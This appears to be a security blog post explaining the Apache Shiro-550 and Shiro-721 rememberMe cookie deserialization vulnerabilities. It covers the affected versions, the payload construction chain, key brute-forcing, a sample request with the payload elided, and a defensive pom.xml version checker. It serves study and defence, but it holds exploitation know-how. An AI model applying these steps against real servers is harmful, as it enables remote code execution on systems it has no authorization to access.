
Shiro Deserialization

Shiro Deserialization Vulnerabilities

1. Introduction to the Shiro framework

Shiro deserialization explained in detail (multiple reproduction scenarios), well worth reading

Apache Shiro is a powerful and flexible security framework used mainly for authentication, authorization, cryptography and session management. It lets developers implement user permission control easily and keep their applications secure.

Apache Shiro deserialization vulnerabilities come in two kinds: Shiro-550 and Shiro-721.

2. Root cause of the vulnerability

  • The Apache Shiro framework provides a remember-me feature (RememberMe): after a successful login it issues a cookie that is encrypted and then encoded.
  • **On the server side the rememberMe cookie value is first base64-decoded, then AES-decrypted, then deserialized, which is what leads to the deserialization RCE vulnerability.**
  • The payload is therefore built as: command => serialize => AES encrypt => base64 encode => RememberMe cookie value
  • data -> serialize -> AES encrypt -> base64 -> stored in rememberMe; rememberMe -> base64 decode -> AES decrypt -> deserialize
  • The crucial element in the whole exploitation process is the AES key: if the default key has not been changed, the key is trivially known and constructing the payload is very simple.

3. Affected versions

Shiro-550: Apache Shiro < 1.2.4

Shiro-721: Apache Shiro = 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1

4. Discovery approach

4.1 Black-box discovery

Because Shiro is an authentication, authorization and cryptography framework, the place it usually shows up is the login form. Capture the login request and check whether the Cookie field contains rememberMe or similar fields, or use one of Burp's passive scanning extensions to determine whether the Shiro framework is in use.

Once the Shiro framework has been identified, an all-in-one tool can be used to test whether a Shiro vulnerability is present.

Brute-force the key and detect the gadget chain:

```http
GET / HTTP/1.1
Cookie: rememberMe=[payload elided]
Authorization: Basic d2hvYW1p
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=12D77B15B8ABEE32B592B283EB1D46AA
Host: 192.168.165.252:8088
Connection: close
```

The response body contains the output of the executed command, base64-encoded.

4.2 White-box discovery

Check the project's pom.xml or its dependencies to see whether the Shiro framework is used.

Check whether the Shiro version is a vulnerable one, and look at Shiro's AES encryption key.

The AES key normally lives in the project's configuration files. If the default key is in use, it will not be found in the project's own files; instead it is hard-coded inside the RememberMeManager implementation.
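A static version check for the white-box steps above, written as an added example for this post (it is not the author's code). It parses a constructed pom.xml, resolves a `${...}` Maven property reference, and classifies the declared Shiro version against the affected versions listed in section 3; 1.2.4 itself is counted under Shiro-550 because section 5.1 notes that its default key is still hard-coded.

```python
import re
import xml.etree.ElementTree as ET
POM_NS = "{http://maven.apache.org/POM/4.0.0}"
# Affected versions as listed in section 3 of this post.
SHIRO_721_VERSIONS = {"1.2.5", "1.2.6", "1.3.0", "1.3.1", "1.3.2",
                      "1.4.0-RC2", "1.4.0", "1.4.1"}
# Constructed sample pom.xml; the version is pulled in through a Maven property.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <properties><shiro.version>1.2.4</shiro.version></properties>
  <dependencies>
    <dependency>
      <groupId>org.apache.shiro</groupId>
      <artifactId>shiro-core</artifactId>
      <version>${shiro.version}</version>
    </dependency>
  </dependencies>
</project>"""

def parse_version(v):
    """Turn '1.4.0-RC2' into a sortable tuple; a qualifier sorts before the final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-(.+))?", v)
    if not m:
        raise ValueError(f"unrecognised Shiro version: {v}")
    major, minor, patch, qualifier = m.groups()
    return (int(major), int(minor), int(patch), qualifier or "~")  # '~' sorts after letters

def shiro_version_from_pom(pom_xml):
    """Return the declared org.apache.shiro version, resolving a ${property} reference."""
    root = ET.fromstring(pom_xml)
    for dep in root.iter(f"{POM_NS}dependency"):
        if dep.findtext(f"{POM_NS}groupId") != "org.apache.shiro":
            continue
        version = dep.findtext(f"{POM_NS}version")
        if version and version.startswith("${") and version.endswith("}"):
            prop = root.find(f"{POM_NS}properties/{POM_NS}{version[2:-1]}")
            version = prop.text if prop is not None else None
        return version
    return None  # no Shiro dependency declared

def classify(version):
    if version in SHIRO_721_VERSIONS:
        return "Shiro-721"
    # Section 3 says < 1.2.4; section 5.1 shows 1.2.4 still hard-codes the key, so include it.
    if parse_version(version) <= parse_version("1.2.4"):
        return "Shiro-550"
    return "not in the listed affected versions"

if __name__ == "__main__":
    v = shiro_version_from_pom(SAMPLE_POM)
    print(v, "->", classify(v))  # 1.2.4 -> Shiro-550
```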

5. Exploiting Shiro deserialization

5.1 Shiro550

Affected versions: Apache Shiro < 1.2.4

As can be seen, in Shiro version 1.2.4 the default AES encryption key is hard-coded in the source.

Note: when sending the request by hand, delete the sessionId from the request; if a SessionId is present in the request, RememberMe will not be read.

5.2 Shiro721

Shiro-721: Apache Shiro = 1.2.5, 1.2.6, 1.3.0, 1.3.1, 1.3.2, 1.4.0-RC2, 1.4.0, 1.4.1

For Shiro versions above 1.2.4, however, the AES encryption key is generated randomly.

Shiro-721 involves AES-CBC encryption, and the AES key is essentially unguessable because the system generates it randomly. The cookie parsing process is the same as before, which means that if a malicious rememberMe value can be forged and the target contains an exploitable gadget chain, RCE is still possible.

Brute-forcing with a tool fails.

Shiro-721 uses a post-login rememberMe={value} to brute-force the correct key and then deserialize; Shiro-721 is essentially a padding attack, and the brute-force takes a very long time. By comparison, Shiro-550 only needs a sufficiently large key list (a low bar), while Shiro-721 requires a login (a higher bar).

6. Shiro deserialization analysis

Getting started with Shiro deserialization

Deserialization learning path: Shiro550

Deserialization learning path: Shiro-721 analysis

By Lsec
Last updated Jun 10, 2025 15:12 +0800